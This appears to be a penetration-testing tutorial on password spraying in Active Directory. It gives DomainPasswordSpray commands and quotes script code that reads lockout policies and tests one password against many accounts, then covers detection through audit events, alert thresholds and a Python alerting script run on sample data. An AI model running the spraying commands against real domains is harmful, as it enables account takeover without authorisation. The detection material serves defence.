Domain Penetration Series: Password Spraying Attacks

0x01 What is a password spraying attack?

In a conventional brute-force attack the username is fixed and many passwords are tried against it. Password spraying is the reverse: the password is fixed and tried against many usernames, so that each account sees only one or two failed attempts and stays below its lockout threshold. In a domain environment, employees often never change the initial password they were given when their account was created, which is exactly what lets an attacker gain access by spraying that password.

0x02 Password spraying tools

Download:
DomainPasswordSpray

Usage:
1.Invoke-DomainPasswordSpray -Password admin123123
2.Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile out.txt
3.Invoke-DomainPasswordSpray -UsernameAsPassword -OutFile out.txt

1. Specify a single password; by default all domain member accounts are enumerated automatically and sprayed.
2. Specify both a user list and a password list; results are saved to out.txt.
3. Enumerate accounts whose password is the same as the username; results are saved to out.txt.

Lab testing is as follows (the excerpts below are taken from the DomainPasswordSpray script):
    # Use the -Domain parameter to get the domain; fall back to the current domain otherwise
    try
    {
        if ($Domain -ne "")
        {
            $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext("domain",$Domain)
            $DomainObject = [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext)
            $CurrentDomain = "LDAP://" + ([ADSI]"LDAP://$Domain").distinguishedName
        }
        else
        {
            # Default to the current domain
            $DomainObject = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
            $CurrentDomain = "LDAP://" + ([ADSI]"").distinguishedName
        }
    }
    catch
    {
        Write-Host -ForegroundColor "red" "[*] Could not connect to the domain. Try specifying the domain name with the -Domain option."
        break
    }

Function that queries the domain password policy attributes

    # Query the domain's account lockout threshold
    $objDeDomain = [ADSI] "LDAP://$($DomainObject.PDCRoleOwner)"
    $AccountLockoutThresholds = @()
    $AccountLockoutThresholds += $objDeDomain.Properties.lockoutthreshold
    # Read the domain functional level to decide whether fine-grained password policies can be retrieved
    $behaviorversion = [int] $objDeDomain.Properties['msds-behavior-version'].item(0)
    if ($behaviorversion -ge 3)
    {
        Write-Host "[*] Current domain is compatible with Fine-Grained Password Policy."
        $ADSearcher = New-Object System.DirectoryServices.DirectorySearcher
        $ADSearcher.SearchRoot = $objDeDomain
        $ADSearcher.Filter = "(objectclass=msDS-PasswordSettings)"
        $PSOs = $ADSearcher.FindAll()
        if ( $PSOs.count -gt 0)
        {
            Write-Host -foregroundcolor "yellow" ("[*] A total of " + $PSOs.count + " Fine-Grained Password policies were found.`r`n")
            foreach($entry in $PSOs)
            {
                # Collect each PSO's lockout threshold (the smallest one is selected later)
                $PSOFineGrainedPolicy = $entry | Select-Object -ExpandProperty Properties
                $PSOPolicyName = $PSOFineGrainedPolicy.name
                $PSOLockoutThreshold = $PSOFineGrainedPolicy.'msds-lockoutthreshold'
                $PSOAppliesTo = $PSOFineGrainedPolicy.'msds-psoappliesto'
                $PSOMinPwdLength = $PSOFineGrainedPolicy.'msds-minimumpasswordlength'
                $AccountLockoutThresholds += $PSOLockoutThreshold
                Write-Host "[*] Fine-Grained Password Policy titled: $PSOPolicyName has a Lockout Threshold of $PSOLockoutThreshold attempts, minimum password length of $PSOMinPwdLength chars, and applies to $PSOAppliesTo.`r`n"
            }
        }
    }
    # ...
    foreach ($User in $UserListArray)
    {
        if ($UsernameAsPassword)
        {
            $Password = $User
        }

Verifying whether the account and password are correct

        # Bind to the directory with the candidate credentials to check whether they grant access
        $Domain_check = New-Object System.DirectoryServices.DirectoryEntry($CurrentDomain,$User,$Password)
        if ($Domain_check.name -ne $null)
        {
            if ($OutFile -ne "")
            {
                Add-Content $OutFile $User`:$Password
            }
            Write-Host -ForegroundColor Green "[*] SUCCESS! User:$User Password:$Password"
        }
        $curr_user += 1
        Write-Host -nonewline "$curr_user of $count users tested`r"
        if ($Delay)
        {
            Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
        }
    }

0x04 Detection

The main detection methods are:
1. Enable appropriate logging:
1.1 Domain controllers: "Audit Logon" (success and failure), for event ID 4625.
1.2 Domain controllers: "Audit Kerberos Authentication Service" (success and failure), for event ID 4771.
1.3 All systems: "Audit Logon" (success and failure), for event ID 4648.
2. Configure an alert for more than 50 4625 events within 1 minute.
3. Configure an alert for more than 50 4771 events with failure code "0x18" within 1 minute.
4. Configure an alert for more than 100 4648 events on a workstation within 1 minute.
5. Based on the following command, write a PowerShell script that runs daily and reports possible password spraying:

Get-ADUser -Filter * -Properties lastbadpasswordattempt,badpwdcount | Select-Object name,lastbadpasswordattempt,badpwdcount | Format-Table -AutoSize
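The alert rules in steps 2 to 4 and the daily report in step 5 can be prototyped offline before being turned into SIEM rules. The following Python script is an added example, not code from this post or from DomainPasswordSpray: it slides a one-minute window over constructed sample events (the `Event` fields `time`, `event_id`, `account`, `source` and `status` are assumptions made for the example, as are the dictionary keys that stand in for the `Get-ADUser` output) and raises one alert per rule the first time the page's thresholds are exceeded. The alert also reports how many distinct accounts and sources fell inside the window, which goes slightly beyond the page: a spray touches many accounts from few sources, whereas one user mistyping a password does not.

```python
"""Alert logic for the spraying indicators above (steps 2-4) and a daily badPwdCount
report in the spirit of step 5. Added example; runs over constructed sample data, not a
live event log. Event fields and user-record keys are assumptions for this example."""
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Iterable


@dataclass(frozen=True)
class Event:
    time: datetime
    event_id: int        # 4625 failed logon, 4771 Kerberos pre-auth failure, 4648 explicit credentials
    account: str         # account the attempt targeted
    source: str          # source address for DC events, hostname for workstation events
    status: str = ""     # Kerberos failure code for 4771, e.g. "0x18" (wrong password)


# One rule per step of the post: required status, threshold, window, and whether the
# count is domain-wide (DC events) or per host (4648 on workstations).
RULES = {
    4625: {"status": None,   "threshold": 50,  "window": timedelta(minutes=1), "per_host": False},
    4771: {"status": "0x18", "threshold": 50,  "window": timedelta(minutes=1), "per_host": False},
    4648: {"status": None,   "threshold": 100, "window": timedelta(minutes=1), "per_host": True},
}


def detect_spray(events: Iterable[Event]) -> list[dict]:
    """Slide each rule's window over its events; alert once per key when count > threshold."""
    windows: dict = defaultdict(deque)
    alerted: set = set()
    alerts: list[dict] = []
    for ev in sorted(events, key=lambda e: e.time):
        rule = RULES.get(ev.event_id)
        if rule is None:
            continue
        if rule["status"] is not None and ev.status.lower() != rule["status"]:
            continue
        key = (ev.event_id, ev.source if rule["per_host"] else "*")
        q = windows[key]
        q.append(ev)
        while ev.time - q[0].time > rule["window"]:   # drop events that fell out of the window
            q.popleft()
        if len(q) > rule["threshold"] and key not in alerted:
            alerted.add(key)
            alerts.append({
                "event_id": ev.event_id, "scope": key[1], "count": len(q),
                # many accounts from few sources is the spraying signature
                "distinct_accounts": len({e.account for e in q}),
                "distinct_sources": len({e.source for e in q}),
                "first": q[0].time, "last": ev.time,
            })
    return alerts


def report_bad_passwords(users: Iterable[dict], now: datetime,
                         since: timedelta = timedelta(days=1)) -> list[dict]:
    """Daily report: accounts with a failed attempt in the last `since`. During a spray each
    badPwdCount stays at 1 or 2 (below lockout), so the signal is how many accounts show up."""
    hits = [u for u in users
            if u["badpwdcount"] > 0 and u["lastbadpasswordattempt"] is not None
            and now - u["lastbadpasswordattempt"] <= since]
    return sorted(hits, key=lambda u: u["lastbadpasswordattempt"])


# ---- constructed sample data (not captured from a real domain) ----
BASE = datetime(2024, 1, 1, 9, 0, 0)


def burst(event_id: int, n: int, seconds: float, source: str, status: str = "") -> list[Event]:
    """n events spread evenly over `seconds`, each against a different account."""
    return [Event(BASE + timedelta(seconds=i * seconds / n), event_id, f"user{i:03d}", source, status)
            for i in range(n)]


SAMPLE_EVENTS = (
    burst(4625, 55, 40, "10.0.0.5")                   # 55 failed logons in 40 s: alert
    + burst(4771, 20, 30, "10.0.0.5", "0x18")         # 20 pre-auth failures: below threshold
    + burst(4648, 105, 30, "WS02")                    # 105 explicit-credential logons on one host: alert
    # one failed logon every 10 s for 10 minutes: never more than 7 in any minute, no alert
    + [Event(BASE + timedelta(hours=1, seconds=10 * i), 4625, f"slow{i:02d}", "10.0.0.9") for i in range(60)]
)

NOW = datetime(2024, 1, 2, 8, 0, 0)
SAMPLE_USERS = [
    {"name": "alice", "lastbadpasswordattempt": NOW - timedelta(hours=2), "badpwdcount": 1},
    {"name": "bob",   "lastbadpasswordattempt": NOW - timedelta(minutes=30), "badpwdcount": 1},
    {"name": "carol", "lastbadpasswordattempt": None, "badpwdcount": 0},
    {"name": "dave",  "lastbadpasswordattempt": NOW - timedelta(days=3), "badpwdcount": 3},
]

if __name__ == "__main__":
    for a in detect_spray(SAMPLE_EVENTS):
        print(f"ALERT {a['event_id']} scope={a['scope']} count={a['count']} "
              f"accounts={a['distinct_accounts']} sources={a['distinct_sources']}")
    for u in report_bad_passwords(SAMPLE_USERS, NOW):
        print(f"{u['name']:8} {u['lastbadpasswordattempt']:%Y-%m-%d %H:%M} badPwdCount={u['badpwdcount']}")
```

The slow 4625 stream in the sample shows why the window matters: sixty failures spread over ten minutes never put more than seven events in any one-minute window, so the page's rule stays quiet, and a real deployment would pair the burst rule with the daily badPwdCount report to catch sprays that are deliberately throttled.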